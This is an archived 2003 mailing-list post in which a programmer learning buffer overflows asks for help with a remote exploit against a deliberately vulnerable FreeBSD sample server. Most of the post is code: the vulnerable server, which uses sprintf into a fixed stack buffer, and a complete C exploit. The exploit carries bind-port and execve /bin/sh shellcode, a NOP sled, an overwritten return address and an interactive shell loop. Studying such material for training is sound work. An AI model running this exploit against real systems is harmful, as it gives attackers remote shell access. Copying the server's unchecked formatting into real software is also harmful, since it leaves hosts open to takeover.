sample buffer overflow exploit problem

From: Ganbold (ganbold_at_micom.mng.net)
Date: 09/27/03

  • Next message: Pedro Jota Calvorota: "Object Data IE Exploit" 
    Date: Sat, 27 Sep 2003 16:54:59 +0900
To: vuln-dev@securityfocus.com

    Hi,

    I'm very new to buffer overflow exploit technics and my boss wants me to
    thoroughly understand
    how it works. I'm trying to exploit sample network server in FreeBSD 5.1
    for this purpose.
    When I try to exploit using execve /bin/sh (shellcode1), it works and
    launches the shell in the remote machine.
    However when I try to use port binding shell code, it binds shell to the
    port, but when I try to connect to
    it, it just closes the connection. Also I can't connect to bind port after
    sending buffer using following code snippets:
    ..............
            printf("[-] Connecting to bindshell...\n");
            remote.sin_family = AF_INET;
            remote.sin_addr = *((struct in_addr *)host->h_addr);
            remote.sin_port = htons(12345);
            if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
            {
                    close(s);
                    fprintf(stderr, "Error: connect\n");
                    return -1;
            }
            exec_sh(s);
    ...............

    I appreciate if somebody give me some help to solve this test problem.
    Is there anywhere I can find detailed explanation about buffer overflows
    and working sample network exploits?
    Is there anyway I can generate shellcodes in FreeBSD?

    I attached my sample server code and exploit code.

    thanks in advance,

    Ganbold Ts,

    senior programmer,
    Micom Co., Ltd
    Ulaanbaatar,
    Mongolia

    Following is network server code:
    --------------------------------------------------------------------------------------------------------------------------------
    #include <stdio.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <errno.h>

    #define BUFFER_SIZE 1024
    #define NAME_SIZE 2048

    int handle(int c)
    {
            char buffer[BUFFER_SIZE], name[NAME_SIZE];
            int bytes;
            strcpy(buffer, "Your name?: ");
            bytes = send(c, buffer, strlen(buffer), 0);
            if (bytes == -1)
                    return -1;
            bytes = recv(c, name, sizeof(name), 0);
            if (bytes == -1)
                    return -1;
            name[bytes - 1] = '\0';
            sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);
            bytes = send(c, buffer, strlen(buffer), 0);
            if (bytes == -1)
                    return -1;
            return 0;
    }

    int main(int argc, char *argv[])
    {
            int s, c, cli_size;
            struct sockaddr_in srv, cli;
            if (argc != 2)
            {
                    fprintf(stderr, "usage: %s port\n", argv[0]);
                    return 1;
            }
            s = socket(AF_INET, SOCK_STREAM, 0);
            if (s == -1)
            {
                    perror("socket() failed");
                    return 2;
            }
            srv.sin_addr.s_addr = INADDR_ANY;
            srv.sin_port = htons( (unsigned short int) atol(argv[1]));
            srv.sin_family = AF_INET;
            if (bind(s, &srv, sizeof(srv)) == -1)
            {
                    perror("bind() failed");
                    return 3;
            }
            if (listen(s, 3) == -1)
            {
                    perror("listen() failed");
                    return 4;
            }
            for(;;)
            {
                    c = accept(s, &cli, &cli_size);
                    if (c == -1)
                    {
                            perror("accept() failed");
                            return 5;
                    }
                    fprintf(stderr,"client from %s\n", inet_ntoa(cli.sin_addr));
                    if (handle(c) == -1)
                            fprintf(stderr, "%s: handle() failed", argv[0]);
                    close(c);
            }
            return 0;
    }
    --------------------------------------------------------------------------------------------------------------------------------

    Following is the sample exploit code:
    --------------------------------------------------------------------------------------------------------------------------------
    #include <stdio.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <errno.h>
    #include <unistd.h>

    /*
      * FreeBSD shellcode - binds /bin/sh to a port 12345
      *
      * Claes M. Nyberg 20020619
      *
      * <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
      */
    char shellcode[]
    =
    /* port _______*/
            "\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
            "\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
            "\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
            "\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
            "\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
            "\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
            "\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
            "\x40\x50\x50\xcd\x80";

    /*
      * FreeBSD shellcode - execve /bin/sh
      *
      * Claes M. Nyberg 20020120
      *
      * <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
      */
    char shellcode1[] =
         "\x31\xc0" /* xorl %eax, %eax */
         "\x50" /* pushl %eax */
         "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
         "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
         "\x89\xe3" /* movl %esp, %ebx */
         "\x50" /* pushl %eax */
         "\x53" /* pushl %ebx */
         "\x89\xe2" /* movl %esp, %edx */
         "\x50" /* pushl %eax */
         "\x52" /* pushl %edx */
         "\x53" /* pushl %ebx */
         "\x50" /* pushl %eax */
         "\xb0\x3b" /* movb $0x3b, %al */
         "\xcd\x80" /* int $0x80 */
         "\x31\xc0" /* xorl %eax, %eax */
         "\x40" /* inc %eax */
         "\x50" /* pushl %eax */
         "\x50" /* pushl %eax */
         "\xcd\x80"; /* int $0x80 */

    #define RET 0xbfbffa48

    int exec_sh(int sockfd)
    {
             char snd[4096],rcv[4096];
             fd_set rset;
             while(1)
             {
                     FD_ZERO(&rset);
                     FD_SET(fileno(stdin),&rset);
                     FD_SET(sockfd,&rset);
                     select(255,&rset,NULL,NULL,NULL);
                     if(FD_ISSET(fileno(stdin),&rset))
                     {
                             memset(snd,0,sizeof(snd));
                             fgets(snd,sizeof(snd),stdin);
                             write(sockfd,snd,strlen(snd));
                     }
                     if(FD_ISSET(sockfd,&rset))
                     {
                             memset(rcv,0,sizeof(rcv));
                             if(read(sockfd,rcv,sizeof(rcv))<=0)
                                     exit(0);
                             fputs(rcv,stdout);
                     }
             }
    }

    int main(int argc, char *argv[]) {

            char buffer[1064];
            int s,t, i, size;
            struct sockaddr_in remote;
            struct hostent *host;

            if(argc != 3) {
                    printf("Usage: %s target-ip port\n", argv[0]);
                    return -1;
            }

            // filling buffer with NOPs
            memset(buffer, 0x90, 1064);

            //copying shellcode into buffer
            memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode));

            // the previous statement causes a unintential Nullbyte at buffer[1000]
            buffer[1000] = 0x90;

            // Copying the return address multiple times at the end of the buffer...
            for(i=1022; i < 1059; i+=4) {
                    * ((int *) &buffer[i]) = RET;
            }

            buffer[1063] = 0x0;

            //getting hostname

            host=gethostbyname(argv[1]);
            if (host==NULL)
            {
                    fprintf(stderr, "Unknown Host %s\n",argv[1]);
                    return -1;
            }

            // creating socket...
            s = socket(AF_INET, SOCK_STREAM, 0);
            if (s < 0)
            {
                    fprintf(stderr, "Error: Socket\n");
                    return -1;
            }
            remote.sin_family = AF_INET;
            remote.sin_addr = *((struct in_addr *)host->h_addr);
            remote.sin_port = htons(atoi(argv[2]));
            // connecting with destination host
            if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
            {
                    close(s);
                    fprintf(stderr, "Error: connect\n");
                    return -1;
            }
            //sending exploit string
            size = send(s, buffer, sizeof(buffer), 0);
            if (size==-1)
            {
                    close(s);
                    fprintf(stderr, "sending data failed\n");
                    return -1;
            }
    /*
            printf("[-] Connecting to bindshell...\n");
            remote.sin_family = AF_INET;
            remote.sin_addr = *((struct in_addr *)host->h_addr);
            remote.sin_port = htons(12345);
            if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
            {
                    close(s);
                    fprintf(stderr, "Error: connect\n");
                    return -1;
            }
            exec_sh(s);
    */
            // closing socket
            close(s);
    }

    --------------------------------------------------------------------------------------------------------------------------------

  • Next message: Pedro Jota Calvorota: "Object Data IE Exploit"